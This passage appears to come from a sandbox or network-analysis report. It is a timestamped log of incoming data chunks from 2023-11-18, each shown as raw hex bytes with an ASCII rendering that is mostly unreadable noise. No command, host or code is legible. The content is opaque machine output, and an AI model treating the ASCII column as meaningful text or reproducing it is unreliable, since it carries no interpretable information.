8c 9b bd 80 b1 8c da 62 15 f3 18 25 ec d5 89 24 ad 5c 86 26 27 0f 70 93 93 9f 31 19 f7 23 7c 73 54 cf 78 e1 68 96 d7 a0 e4 15 a7 69 8d c1 6b e7 6a c3 b0 81 30 4c Data Ascii: x(},@[},y5{Wmfe<ZEP/m#.z8!7=_Q"2\aX\lM.h`rH-9y{9P2:/a"t4rXwC'VEK)\L@Rm*_&b%$\&'p1#\|sTxhikj0L
2023-11-18 09:02:40 UTC	8116	IN	Data Raw: d5 e5 ed ba c1 97 aa 23 67 6a 9a e3 dc 7d c4 b7 7c 4e 18 0c 82 3e 53 b3 07 68 77 fd 41 ea b9 19 b4 9a 9c 83 3d c2 6b cf 8e a5 f9 bc d2 d7 c6 46 5c f7 b0 af c6 c9 04 8a 2e 35 3f 7e d4 fa f1 9b bf 97 1f df b8 77 28 fe 5a 97 cd b0 58 36 e8 60 85 33 84 35 fd 74 e1 29 0f d6 d6 e5 d2 05 bd 90 72 2f 1e c2 e9 45 45 20 fe 2a 65 a5 cb 58 52 cd 40 d6 b0 a0 bf 76 7c e1 1d 0c 3a 41 be f3 01 39 b5 29 ab 5a 66 c9 b3 22 a9 d0 45 ca aa 96 2a 58 d5 b2 e9 7f 1d bc 81 1b 3f 00 82 65 71 05 a3 fc 40 6f ca 0c 43 ad 9c 61 e8 fe 21 d8 3f 9c 6e 75 6d 1d e4 f3 67 4f 1b 28 0d 54 f8 27 43 b9 3d 7d e4 b4 ef d4 dc 8c d3 d8 ea 65 31 2b 37 e6 2c 86 57 fa 5b 55 63 1e ac 6b 06 87 35 41 36 4d d7 fe 83 c6 74 a9 12 6d 1b bb bb 47 d4 b3 66 05 9f 35 17 8d e5 20 9d 01 17 fd 4f 8b d9 83 bc d9 83 Data Ascii: #gj}\|N>ShwA=kF\.5?~w(ZX6`35t)r/EE eXR@v\|:A9)Zf"EX?eq@oCa!?numgO(T'C=}e1+7,W[Uck5A6MtmGf5 O
2023-11-18 09:02:40 UTC	8132	IN	Data Raw: 01 9a c7 0f a3 76 d6 0f 59 de 67 20 6f 6d 96 a6 65 4c ad 4c 0d 19 09 de c2 08 26 ae a7 78 79 16 ae e2 67 e1 3a ac bb ae 34 e2 4c 0c f1 3d f0 cd a0 30 15 40 ab 93 af c4 5b e2 36 59 14 44 e4 5c 23 22 60 3e e0 d6 03 2b b1 92 13 e4 57 8c c1 b8 8a 6e b0 2c 7e 54 95 a4 ff 33 24 c2 86 78 62 f2 7c a4 93 7d 59 d3 3f ec c3 6c 4e 8f 9e 06 45 e1 a5 bf e8 b6 eb 73 f0 9f d0 24 b0 ae 36 bb 37 d8 c0 71 c1 16 37 f9 56 a0 87 94 bb ea c7 9e 72 01 f2 18 6c 69 ab b3 cd 67 9e 72 89 e9 6a 3d 7b 24 cd 99 22 e4 34 9e c2 69 6f a4 b2 b7 e5 5a 14 fc 53 17 6d fa 37 97 c6 f6 90 de 08 7a ff f1 f0 69 15 54 4e cd b0 4b ce 82 00 67 23 c9 7a 52 c8 7a d3 90 bd 2e 2d 59 d4 28 3c db 95 02 f4 f9 e4 01 10 af 17 dd 2a c0 bb 8a 60 a2 4c 91 ae e2 54 fc 28 0a 11 38 7c 45 65 92 af 67 cd af 5b 56 86 Data Ascii: vYg omeLL&xyg:4L=0@[6YD\#"`>+Wn,~T3$xb\|}Y?lNEs$67q7Vrligrj={$"4ioZSm7ziTNKg#zRz.-Y(<*`LT(8\|Eeg[V
2023-11-18 09:02:40 UTC	8148	IN	Data Raw: 38 dc 2b e1 10 7e 93 e3 a0 02 0e 78 a1 e3 21 32 f0 57 3b e0 13 23 95 1f 68 d1 c9 28 c7 1d 60 d2 5a 49 9e 9c 48 22 8f dc 47 8c 84 55 96 27 b9 8f e4 99 dc 47 e2 d9 11 fe 75 6a 8c 6f 00 24 46 e6 0f 63 8d 5a 24 c9 73 33 90 1b 77 49 13 da 8d ad 01 13 33 28 a8 e9 f1 2b 75 72 94 fc 9d 9e 1c 2d 16 df ee 37 a4 0d 48 03 3e 92 01 a7 8f e4 19 91 7e 07 88 5a 26 89 9a 5e 47 64 ba de 4e b0 bc 21 7e 5d af 83 17 36 8a 42 ad 7e 85 5c 33 4f 27 a7 60 85 b5 72 32 fa 6e e3 d2 f6 26 33 e3 ca f9 9c 66 50 81 0c 4c 88 18 40 28 5a 36 9d 17 c1 d3 c9 b2 98 9a 68 cc 86 fc 0c 3a 95 6b 1a b3 22 89 9a fe 67 a1 4a 49 5d e4 ab 96 e3 03 c5 55 0b f7 95 6e 90 8c 88 b4 86 dc 86 b4 be 78 94 3e 7e c2 86 c6 4d 9e b0 d6 fa ad 16 13 e3 99 35 9e 66 30 a5 6b 90 0f a6 06 eb c1 34 ff 00 eb 94 9b 5a 86 Data Ascii: 8+~x!2W;#h(`ZIH"GU'Gujo$FcZ$s3wI3(+ur-7H>~Z&^GdN!~]6B~\3O'`r2n&3fPL@(Z6h:k"gJI]Unx>~M5f0k4Z
2023-11-18 09:02:40 UTC	8164	IN	Data Raw: 09 f7 61 25 f8 20 67 60 9c c1 3d 49 cf 6f 02 cb 2a df 9d 87 a6 72 9a a0 01 07 97 e1 ab 49 18 ed 50 b3 c4 d8 9b 34 cc dc 8d cf 63 4e 82 b1 d3 0a c6 cb fe 20 45 e9 a2 8d 6b cd ed 7d cc 91 34 90 eb a2 cd 95 7c 02 ac 53 20 cf ac 76 77 8f 24 59 9f 38 cd b2 f9 b6 a4 61 2e ea c5 94 94 5a dc c0 fc 34 33 f3 e3 04 a6 91 4d 6a 28 2e da 65 cc 06 fa 94 a9 8d 0f ca e3 47 b9 c5 0a 55 8e ba 96 6d 54 8e 32 95 a3 49 dd 13 fe aa be 40 fe a3 83 b2 a0 6f 95 45 f7 b8 66 73 1a 85 ee 26 06 b5 42 06 b5 5e b9 99 41 ad fd df d3 8f 72 0e 8e 06 97 e0 d6 23 bc 2c 3e 59 91 e2 d4 35 d1 4b c8 6c d1 4b 34 f0 98 55 d3 7c 39 c3 41 da f1 d9 96 5b c7 37 20 cb f8 ae a5 f1 b9 5f 2b ef 58 1e f4 95 a5 3b c7 a4 ed 51 f7 09 eb 28 78 0b 53 fb 2b e4 fe e6 73 7f c3 b3 f4 f7 e9 63 ca 3a e2 eb 1c 9b 4d Data Ascii: a% g`=Io*rIP4cN Ek}4\|S vw$Y8a.Z43Mj(.eGUmT2I@oEfs&B^Ar#,>Y5KlK4U\|9A[7 _+X;Q(xS+sc:M
2023-11-18 09:02:40 UTC	8180	IN	Data Raw: 39 a9 db 83 d9 75 64 f3 95 44 1b 81 50 3a d7 13 c4 b8 6b e1 df 24 31 75 07 f5 41 27 d5 d2 80 74 4f e3 bb 30 0a b8 a0 47 76 63 c8 14 a9 be ea 57 71 5d d6 2d ba 3b 06 11 23 ed f4 9d 3a c3 19 a9 e8 7a 19 90 6a 03 cb 13 f8 77 08 5a 68 29 ec 7b 11 24 4a a7 21 5e de 37 bc 2f b4 b0 9b 26 20 f2 0e 8b 21 0a 8b 87 d0 7d 3b ff d8 13 05 cc 03 7e 18 05 9e fd e3 ff 21 85 bd f6 8c 82 0a b7 23 45 f5 c1 e8 2e e1 08 81 a2 05 e3 d8 7c e4 fb c1 0b 14 48 81 7c de f2 47 86 0a 89 a3 88 0b 2a d8 b1 47 4c c1 76 34 42 c7 1f ee d1 ed 53 4c 3d 7a de 37 f4 cf bc cb f7 0f e4 b2 cb cf db 01 c2 26 82 30 5e a7 76 f9 5b f2 3a c1 0e a2 5f 96 29 cd 3b 3f 4c dc 5c 11 26 9d 15 37 ef f1 fe ac c5 79 79 50 e5 6d b8 a6 c0 ce 97 76 a8 fa 21 10 a6 70 b3 7e 0d ca e7 c3 bd e5 24 9d 07 78 03 a3 a5 cf Data Ascii: 9udDP:k$1uA'tO0GvcWq]-;#:zjwZh){$J!^7/& !};~!#E.\|H\|G*GLv4BSL=z7&0^v[:_);?L\&7yyPmv!p~$x
2023-11-18 09:02:40 UTC	8196	IN	Data Raw: 79 93 d5 aa 55 13 c5 04 15 7b 2d d5 a1 4b 52 dc 61 ef 1c 9d 67 b1 3e ee 02 f5 fe 6e d1 7b 7a 80 a2 6b f2 2e b8 ec 3c 72 59 74 7d c9 3c 69 24 21 4e c4 b5 20 03 09 ea c4 df d7 b9 cf 63 1e f1 f7 f5 ae dd f6 48 18 b8 a7 ea 07 b0 db 4c 74 e8 c2 c9 6e ca d0 e1 45 72 78 82 28 45 f6 b1 7b f6 7a 36 a7 88 42 35 e1 f9 22 f7 9e b5 37 e0 fc 77 37 af bd c6 b2 4b da 29 ce af c7 a9 1e 57 1f 57 47 d3 0b 8f 20 a5 93 03 81 0c c0 ec d9 dc 85 be 4b 47 97 e5 ac bd 19 8f 7e db 4d 7a df 7d 26 12 85 c9 31 4c 93 ef 9d eb 65 8f 2b 49 be 3b c7 d2 d2 03 87 3b 23 ae 5d 74 7f 30 50 10 64 70 72 af c7 7b 89 75 e2 a6 06 3e ed 75 52 a3 f8 bb da b1 e8 7b c6 84 ca c9 bb c2 55 97 6f ae 03 a2 fb 32 73 f1 63 7a 67 0c 77 33 3a 07 12 8c 5f 46 1e ab 52 9c 01 bd f3 ab 31 ba fd c0 90 d7 48 ad d0 b0 Data Ascii: yU{-KRag>n{zk.<rYt}<i$!N cHLtnErx(E{z6B5"7w7K)WWG KG~Mz}&1Le+I;;#]t0Pdpr{u>uR{Uo2sczgw3:_FR1H
2023-11-18 09:02:40 UTC	8212	IN	Data Raw: e0 ab a3 84 6d b8 f6 92 55 04 68 99 d1 e6 58 c1 77 51 6d 05 40 44 f2 30 25 c6 97 f7 dc d7 86 06 60 2f 95 e7 11 be 30 b1 1b aa 15 96 2e 62 e5 b3 e6 d1 21 db 07 f0 de cf 3b c4 82 1d f0 7c 08 cf 5e 78 f6 c3 73 04 9e 2b 12 fe ff e7 f1 41 7b 4f c3 73 1e 9e cb f0 e8 21 6e 08 3c a8 12 e2 67 b2 63 61 4a c5 71 09 a1 00 ad fb 81 d8 69 98 a6 d1 88 d6 26 39 45 88 f1 c2 d4 a9 a1 bf c7 56 4c 21 db d4 3c a4 fe 6b d6 18 c7 56 dc ae fc e6 b2 25 17 21 10 3b d1 e8 82 09 16 7d 7d ba 9d 49 18 82 d0 77 96 be 53 27 a3 96 c5 5e aa e5 b9 4c b7 a6 51 aa ca b3 47 a3 d3 98 c4 78 68 89 76 ed 22 4b 55 a5 c8 1c 2a a6 28 e2 de 0f a7 bb 5d 4d c7 bf a3 61 78 1e f9 a1 c9 96 05 6b 41 c3 cd b2 89 65 66 f3 99 26 e7 b1 55 e6 94 65 97 68 b9 9e 9c 22 24 af a3 2c b4 9e 42 5b 01 25 51 e2 ca ad 85 Data Ascii: mUhXwQm@D0%`/0.b!;\|^xs+A{Os!n<gcaJqi&9EVL!<kV%!;}}IwS'^LQGxhv"KU*(]MaxkAef&Ueh"$,B[%Q
2023-11-18 09:02:40 UTC	8228	IN	Data Raw: fb dc 64 af 85 fc 45 c2 4c 71 a3 f8 97 68 96 46 4a 63 a4 87 a5 27 a5 57 a4 b7 24 93 e3 4b 47 83 fa a2 7a 8c 13 91 01 49 c7 e7 6e 8e cf 54 b4 06 e1 e9 43 36 fa 7b c6 ce f6 b2 13 f8 19 7c 15 df 2f 50 62 b3 74 aa b4 4a ea 75 6c 55 3f 52 bf 54 7f 57 13 b5 e3 9d 77 3a d1 7a 32 a4 e8 0a 2e d3 36 d9 36 dd d6 69 3b d7 86 ec d9 f6 7c 7b ab fd 07 fb 4d fc 31 c2 87 c2 13 e2 4f 62 95 d2 a4 f4 29 27 2b 17 2a 97 29 d7 ab 77 a8 07 d5 d3 b4 73 b5 4b 40 7e fe d4 56 3a cf 74 ae 75 5e ed dc 83 db b2 05 21 1f fc c9 a4 cf a3 2f a5 6f a4 6f a3 8f e5 ef e2 5f e4 cd 42 a6 30 46 98 28 fc 2a ac 95 7e 96 fe 92 32 1d 23 1d a7 3b be 71 fc ec 30 cb 99 f2 85 f2 a3 f2 53 f2 6b f2 db f2 bf 94 37 d4 ef a0 6d c3 b4 02 98 87 43 da 34 5c e6 0e b2 34 d1 ab a2 47 fa 54 fa c6 81 f6 40 ff 20 fd Data Ascii: dELqhFJc'W$KGzInTC6{\|/PbtJulU?RTWw:z2.66i;\|{M1Ob)'+)wsK@~V:tu^!/oo_B0F(~2#;q0Sk7mC4\4GT@
2023-11-18 09:02:40 UTC	8244	IN	Data Raw: 57 37 50 bc cb 3b b0 e7 54 38 3f 37 6e 65 1d dd ba 58 3c 9c 3b 44 5b f4 51 ad 0c fe 56 45 57 53 83 ee 14 cb 47 19 b5 59 dc 5d 62 45 04 24 a8 b4 02 5d 04 a4 3f 8e 5a d8 81 71 27 8f 32 e8 b6 98 0a db 7a 89 1b 5f b8 66 54 9c a6 c7 34 ab 28 ff 9f 51 78 de be 3c 22 1c c8 f1 a6 02 03 30 ba e5 5b 0a e3 94 82 45 3a a6 5d b9 a3 4d 86 97 cb 1b bd 3e 4f 2d 7e 9f 04 3f 38 28 af ae a9 73 1d e7 a9 73 35 d6 e1 37 4c 5c 15 a8 70 ee 98 9c d8 72 23 c6 f6 b6 31 a6 21 11 b8 8f f7 16 fd 13 06 fa 77 7b b1 71 ba 23 8c 8f 9d 63 0d f3 12 c1 f9 de f8 54 a1 1c 3c 9d ce ee 36 ac 53 75 09 5a 61 7c 82 80 fd a0 d0 fe f6 86 91 e1 ea 6a e9 c6 2a 56 67 86 b5 5d cf f8 d8 81 2a f7 d4 55 d6 34 d4 ea 4f 7c f0 f3 2b df 3c 54 78 70 bc 61 8c e6 f4 36 f5 f4 04 0c bb db cf c6 e7 15 55 ba 5a 08 fe Data Ascii: W7P;T8?7neX<;D[QVEWSGY]bE$]?Zq'2z_fT4(Qx<"0[E:]M>O-~?8(ss57L\pr#1!w{q#cT<6SuZa\|jVg]U4O\|+<Txpa6UZ
2023-11-18 09:02:40 UTC	8260	IN	Data Raw: d0 e7 cd 4d c2 15 32 ce 06 e8 f3 e6 27 e1 1a 19 97 06 e8 f3 16 8c 0a 10 03 f4 79 d7 4c 40 08 d0 e7 3d ba af a6 08 00 1f a0 cf 7b 6c 6a 6b 00 18 ce 00 7d de 6f f8 8f bc e5 00 7d de b5 54 16 5e b1 2e e4 d0 e0 a1 49 68 89 21 30 a0 a1 1d ca f8 7e 88 c2 67 bc 95 39 f4 61 25 f0 55 dc 3d 86 e9 44 24 91 29 80 94 f7 50 c5 13 7c 06 cf 6e 7c 4b 0d 58 cd 0f 55 3d 93 f0 13 f9 16 e8 ef 75 fa db 8b 5b ee 21 15 b2 b6 d3 0e d5 3c 83 60 0b d8 32 77 d7 0e e3 2e 6c c9 dc d1 1e 6d c9 dc 91 2e 13 b4 64 ee e0 e7 50 d0 92 b9 bb 76 98 74 6d b8 c4 6e 1d 36 2e 51 15 79 4d 99 bb ef 80 be 1e 00 5e 88 10 a8 1e d7 e0 fb e0 11 30 d0 a7 e2 d4 77 53 d3 7d 60 a2 11 02 d5 1a 35 b5 f0 9f 48 1f 75 bc 25 1b 97 aa e3 d9 b8 bb 3a 1e e1 48 d5 f1 08 e2 ae 8e 47 e0 cb aa e3 d9 2c 17 75 3c 9b d0 57 Data Ascii: M2'yL@={ljk}o}T^.Ih!0~g9a%U=D$)P\|n\|KXU=u[!<`2w.lm.dPvtmn6.QyM^0wS}`5Hu%:HG,u<W
2023-11-18 09:02:40 UTC	8276	IN	Data Raw: b7 e1 d2 61 67 6f 08 47 c4 70 e8 b0 b3 37 53 a5 d7 30 fc ba d4 a9 c3 ce de 12 f6 b8 61 eb b0 b3 b7 53 89 ef f2 7a c8 4c c7 69 28 0a d2 61 67 4f a7 9a 17 a4 f0 6b 93 9f d4 03 54 79 52 6c 7f 8a 61 22 dd e3 89 6e 69 3c 0f 82 2b 0b d1 61 37 92 1a e5 6b ac 30 1d 76 a3 42 c0 b5 9c d6 ba e6 d4 5a 2f c1 2f 03 ab 1a cd 7f e4 e3 d7 1e b2 d6 7a f1 1d ad ac d1 32 72 ad f5 e2 3b 07 e1 17 2b 95 0e ad f5 e2 5a ca bf 18 a9 74 68 ad 17 37 d0 f2 8b 50 96 5e ef e5 fb 36 19 21 14 d7 8b d3 b4 f2 e7 dc 79 2d df 4f 92 20 96 b0 7a f1 a9 22 4d a5 5b 71 bd b8 5d 04 57 3a 15 d7 8b cf a4 65 bd 32 de b2 cf a3 15 d7 4a 76 49 71 bd f8 5c 5a a3 15 c9 2e 94 56 2f 5e ec b4 9a 8a eb c5 17 7a cc 42 71 bd 78 b9 d7 c1 15 d7 8b bb 85 23 69 2b ae c7 da aa f0 7a 57 65 32 9c d0 b0 a6 ab 2f 83 6c Data Ascii: agoGp7S0aSzLi(agOkTyRla"ni<+a7k0vBZ//z2r;+Zth7P^6!y-O z"M[q]W:e2JvIq\Z.V/^zBqx#i+zWe2/l
2023-11-18 09:02:40 UTC	8292	IN	Data Raw: 1b 8c 63 63 e9 38 36 96 8e 63 63 7b 42 6c 8c 3d 20 9e c9 47 0f 28 01 1b bb 91 a9 61 cf 08 d8 18 fb d9 fd 65 0c 1b e3 43 ef c4 b0 31 3e d4 6e c0 c6 d0 80 8d a1 05 36 86 24 36 86 7a 6c 0c ad b0 31 34 61 63 68 87 8d a1 0d 36 86 4d 62 63 d8 2c 36 86 3a 6c 0c ad b0 31 b4 c2 c6 b0 29 6c 0c 0d d8 18 da 61 63 a8 c7 c6 b0 79 6c 0c 67 87 8d 61 73 d8 18 36 89 8d a1 05 36 86 36 d8 18 da 62 63 d8 1c 36 86 b6 d8 18 6a b0 31 b4 c1 c6 d0 80 8d a1 35 36 86 56 d8 18 ea b0 31 34 63 63 a8 c5 c6 d0 06 1b 43 03 36 86 56 d8 18 5a 62 63 a8 c5 c6 50 87 8d a1 19 1b 43 1d 36 86 16 d8 18 da 60 63 68 c2 c6 d0 84 8d a1 2d 36 86 5a 6c 0c 4d d8 18 ea b1 31 b4 c5 c6 d0 12 1b 43 4b 6c 0c 6d b1 31 b4 c4 c6 d0 12 1b 43 5b 6c 0c 2d b1 31 b4 c4 c6 d0 16 1b 43 4b 6c 0c 2d b1 31 b4 c6 c6 d0 12 Data Ascii: cc86cc{Bl= G(aeC1>n6$6zl14ach6Mbc,6:l1)lacylgas666bc6j156V14ccC6VZbcPC6`ch-6ZlM1CKlm1C[l-1CKl-1
2023-11-18 09:02:40 UTC	8308	IN	Data Raw: 94 00 e7 15 8c fd 80 88 a9 b2 60 63 78 05 a1 d3 ae c4 da 0b 26 8d 14 31 8f 95 e5 50 b4 9d b1 fd 00 53 40 1f c7 23 cb c5 e7 ef 96 a6 76 17 90 33 86 9c 3b af 62 ac fb 2a 22 2b 24 2c 91 b0 2d 57 a3 e9 c3 a4 d6 37 ad a1 8f d8 71 07 0d 9f af 03 f9 03 a1 34 0f 06 18 45 e0 ed d7 60 b8 80 49 9d c7 78 02 b7 e7 63 70 18 77 2d 16 18 d7 c8 d8 8c 27 f2 58 1a 4c 1f dd c9 d8 f5 3b a9 00 7a 09 4b 22 ec e9 eb 18 7b f2 3a 6a e0 8c 27 71 07 75 de fd 70 be 27 20 0f 61 11 84 59 ae 67 ec 27 c2 36 10 14 4d 63 e5 5a 40 59 30 a9 a7 12 14 47 d0 29 37 32 56 72 23 a5 da 40 db 51 a1 b1 88 19 7a 33 63 ff bc 89 d8 04 16 45 d8 e5 c0 d6 dc 2c b0 42 02 e3 08 6c bb 05 9c b7 88 7e 49 58 0a 61 d7 c1 7d b6 c4 0a 08 4c 27 70 cb ad 58 18 dc 2a fa 24 61 4e c2 52 6f 43 dd fe 56 74 b4 d6 9e 7a 82 Data Ascii: `cx&1PS@#v3;b"+$,-W7q4E`Ixcpw-'XL;zK"{:j'qup' aYg'6McZ@Y0G)72Vr#@Qz3cE,Bl~IXa}L'pX$aNRoCVtz
2023-11-18 09:02:40 UTC	8324	IN	Data Raw: 78 66 3d f2 5b 84 ae 5a 49 f8 41 64 42 d9 47 75 72 17 e4 d9 a3 91 09 31 2a 8a 16 ef e7 f1 c3 c8 84 24 2a 8c 0e 26 fc a8 63 42 bf 40 61 1c 70 3f 3e 09 7d 95 33 9c fe 93 ce c4 ef 63 e6 58 67 22 f7 11 7f da 29 ce 5d 90 29 8f 77 26 5e 49 fa d9 49 48 41 e1 21 31 b5 72 1c b3 7e 7e 12 ba 51 75 75 8d 6e 3f 9f 27 7e 93 52 0e ef 5f 74 5c b7 be d1 ba b2 42 36 83 2f 4f 42 4a 5d a0 62 14 d6 3a ff 73 12 22 d9 06 fc 0d f5 ab 93 90 1a 33 fd f5 c9 d2 75 8e af 73 07 55 fd 37 27 a1 26 67 28 f9 b7 91 c9 2b 21 57 d4 57 34 8c 83 cc 1e a9 45 7e d7 89 70 91 5a e6 f7 a7 92 9e af 32 7f 38 95 c4 7c 81 7e ec 44 20 ac e6 00 d0 24 fe 53 67 c8 5d b5 3e f2 9f 4f 25 1f b2 91 ff 72 2a b9 90 41 7e ed 44 90 8a d1 a3 a1 1c 71 2a 49 49 8d 24 93 4f 0d c4 41 33 3b 01 cc ca 92 4f 23 16 43 9d f1 Data Ascii: xf=[ZIAdBGur1$&cB@ap?>}3cXg")])w&^IIHA!1r~~Quun?'~R_t\B6/OBJ]b:s"3usU7'&g(+!WW4E~pZ28\|~D $Sg]>O%rA~DqII$OA3;O#C
2023-11-18 09:02:40 UTC	8340	IN	Data Raw: 01 9f 37 bc c7 81 3e 44 fe d6 83 e3 be cd e0 f8 6e 72 7a 27 f9 db 30 8b 1c ca 20 e4 f9 09 72 f6 28 f9 db 08 a1 17 89 2f 07 fc a7 80 c3 41 df 10 b1 9d 7b 1d 39 7f f6 20 24 a4 4e 4a 68 6f ad 7f 9e 18 3f 4a 8c 2b 53 d4 e8 74 ad 98 a1 c6 4d d9 2c 95 1c cc ce 69 f5 ec 42 ed 1a 90 5b 34 3e 7f da e5 ab c0 cb 3a e7 bd 41 a2 3c 4d c2 3e 4c 53 0c 6e 37 ab 49 9a fd cd eb e9 af f3 fc 6d e4 d7 71 a5 03 bd 09 a9 02 fe 09 52 12 f4 bf 6e fa 5d 7a c7 b7 48 a8 2d c0 5e 4b 58 01 f2 b7 05 5c ec 26 07 17 92 bf 0b 20 fc d6 eb 08 7d 5b 8a f0 b7 8d 91 a3 20 39 7a 5a cf 02 2d c3 ad 9a 81 6f 27 77 b0 78 a5 b0 54 d2 9f 31 3f b4 77 17 32 9b d0 9a 0f 0f 03 0f 16 fc e0 81 3f ad 56 db bb 07 89 06 b4 e6 13 a3 db 45 a5 d3 95 7f 19 d8 f1 43 92 6b f8 0b 7c 66 0c bd 7f 06 7a 9c e7 d3 ff 2f Data Ascii: 7>Dnrz'0 r(/A{9 $NJho?J+StM,iB[4>:A<M>LSn7ImqRn]zH-^KX\& }[ 9zZ-o'wxT1?w2?VECk\|fz/
2023-11-18 09:02:40 UTC	8356	IN	Data Raw: b0 47 f2 c3 6a 91 43 7f 64 b0 05 58 ab 11 1a bc 7f 0c 68 84 09 19 b5 69 f0 a1 e9 13 10 70 00 16 09 8f 43 b5 d9 0c 4d 7f 0e 41 42 f0 6e 6c 23 7f 30 81 6f a3 91 42 2c 25 d2 e0 cc 5e d6 25 31 97 82 c5 b2 97 ea ca d5 49 7e d1 44 f3 94 b5 39 ae cf 58 2c 83 79 27 74 d3 01 7e c1 60 ad 94 5c 7a a6 9e 3c 44 6f 5d 04 aa 55 38 81 b4 6f 81 20 39 36 42 be c6 23 82 08 81 5c a4 2c 34 47 93 68 2d 5e ab e4 db b8 d4 d7 d1 82 69 88 c7 26 af 20 7f ea a1 f5 13 d0 28 ab e2 b0 8c ac cc d6 1e 2c 7f 38 02 21 ae 30 84 15 e4 3e 0a 07 fa e2 44 9f 6c 9c 65 46 7f 79 72 0e 5a 73 e0 ed 86 4a e9 37 e3 f4 66 e3 19 58 c2 a4 1d c7 b6 a4 75 64 cd 6c 81 3c b8 4e 6e 45 d6 c8 75 71 6c bc 16 82 14 34 fa f6 d9 54 4e 15 a8 d4 d3 3c 83 4d e5 4f 27 f4 94 bd 7f a7 cc d5 6c d7 d6 cd 90 c8 51 68 34 66 Data Ascii: GjCdXhipCMABnl#0oB,%^%1I~D9X,y't~`\z<Do]U8o 96B#\,4Gh-^i& (,8!0>DleFyrZsJ7fXudl<NnEuql4TN<MO'lQh4f
2023-11-18 09:02:40 UTC	8372	IN	Data Raw: 04 10 7c 3b 2f c6 a7 a6 fa 75 34 97 3f e3 4b d9 24 0f bc 57 98 e5 48 09 d8 1a 48 b2 d7 19 f8 83 df aa 67 dc cb c1 26 3a 2e c6 e3 28 1f cd 10 b7 f1 06 de 04 c9 5e 9f e5 6c c8 92 ad 61 7b 86 08 33 2c d9 b0 a2 40 d0 8e 14 72 da 49 a0 c2 31 6e 24 d6 88 a4 f0 1c 20 58 70 00 1a ac 89 1c 3b d1 7f 82 94 02 55 89 5c b0 3b 90 19 39 d9 0f cf 23 8e 3b e4 ec 09 ea e3 dd 39 01 7c e4 4a ec 32 ea 3b c4 8b 22 ce a1 1e 4b 0f a4 b4 f7 05 d8 8d a2 12 39 4b ba e0 d4 13 b4 c0 af 25 32 56 b7 21 c4 b4 11 c1 21 71 c7 4e c1 3d 3c 03 34 01 68 fa f7 b4 70 d2 e0 d1 51 2c 2c 5e eb 26 7a ae c4 39 26 65 8c 68 df 72 8e 73 f6 9c 70 16 44 a5 6c 72 da da 24 9f 8e 95 c0 a9 a6 d3 03 23 c9 3f fb 39 45 37 3e 32 b1 11 4e 54 75 09 5d 31 4f 4f cc 00 e7 80 11 13 ad 2d 1f 5b ae 1e 2c ce 5a 6d 65 0f Data Ascii: \|;/u4?K$WHHg&:.(^la{3,@rI1n$ Xp;U\;9#;9\|J2;"K9K%2V!!qN=<4hpQ,,^&z9&ehrspDlr$#?9E7>2NTu]1OO-[,Zme
2023-11-18 09:02:40 UTC	8388	IN	Data Raw: 14 45 4c 32 47 e8 ad 0d e6 f0 81 aa 98 20 85 9b 04 79 d5 94 94 8e 33 29 09 12 cc 6b 00 34 81 fc 97 00 c2 26 83 45 8d 22 24 39 d8 28 5f 5c 93 0e 44 e7 7a 51 44 d4 44 11 dc 91 09 1e f8 6b 9b e8 80 85 3f 7d ce c0 7a 87 27 e9 7e 47 2d 0e 6b 2a 5e d6 99 d7 4d 0b ac 70 20 c9 39 dc ab cb 55 b0 4e ea 92 9c d0 7d bb 87 0a d8 90 b6 f7 52 c1 bc 15 83 96 81 b7 f2 0e b4 05 f0 d3 de 5a 07 e4 69 d9 a4 3e ad b3 9d f5 d6 bb 33 49 f7 79 3f 75 9b e4 d4 ad 26 c3 92 9c a2 bd 67 80 0a 5b 06 78 99 b1 a4 6b c5 0d 49 3b b5 9a b4 53 ab 49 37 ee 9f c5 25 5d eb 7c 2d e9 ee f6 66 34 09 d6 a1 5a d2 b5 52 5b 49 3b 41 9a 74 ad d4 56 92 13 a4 e7 d5 ab 60 e5 3c 93 f6 89 56 d2 ce 79 26 ed 13 ad a4 7d 88 95 74 ad 3c 66 92 f3 98 af 18 c1 3a 8b 4a 7a 49 cd ae bc fc d7 f0 fe c1 af 3d cd 02 5d Data Ascii: EL2G y3)k4&E"$9(_\DzQDDk?}z'~G-k*^Mp 9UN}RZi>3Iy?u&g[xkI;SI7%]\|-f4ZR[I;AtV`<Vy&}t<f:JzI=]
2023-11-18 09:02:40 UTC	8404	IN	Data Raw: 7b 3b a4 29 d4 2f bd 43 89 e0 5a aa df 3b 7c 10 35 65 1c 0d ad 64 4f 19 47 eb 31 27 5e 25 9f e6 d6 53 47 da c5 cd a7 8e 04 49 fd b0 9c ef cc e3 3e a6 0e d8 66 ab 6d 99 69 b6 da 00 9f cb 8e a0 8e 3c f6 76 48 2b a6 5f 5b 66 65 ae b7 43 d4 ab 4e af 6d e1 da be cd 7a 55 5f 77 64 b1 b7 c3 91 c5 de 0e d1 20 ea 09 47 2c ed cc f8 b0 73 e0 01 2e 54 1d 05 e5 75 69 49 4e 86 68 63 54 6b 85 f5 76 38 4a ae b7 43 12 18 fa 76 9e 1d 3d e9 64 88 e8 99 49 e0 0e 3f 24 69 21 e1 ca 2b 38 fa 99 50 e9 f7 29 63 2e d8 1d 7e a8 60 43 c5 21 29 2c b1 f5 8b c7 09 fb af 66 91 7c 74 ce 13 7b 79 33 7f b4 56 bb f9 14 4b e0 ab 74 32 fd 79 c1 01 45 7c 46 55 69 85 af 4c 0b 6f 8a 6c b7 2d 16 14 1e 01 8e d3 f4 e4 00 78 0d 9f c4 2a ba 59 bf 4a b4 33 46 c5 15 f4 0c e6 17 81 98 c4 d6 a0 a3 84 57 Data Ascii: {;)/CZ;\|5edOG1'^%SGI>fmi<vH+_[feCNmzU_wd G,s.TuiINhcTkv8JCv=dI?$i!+8P)c.~`C!),f\|t{y3VKt2yE\|FUiLol-x*YJ3FW
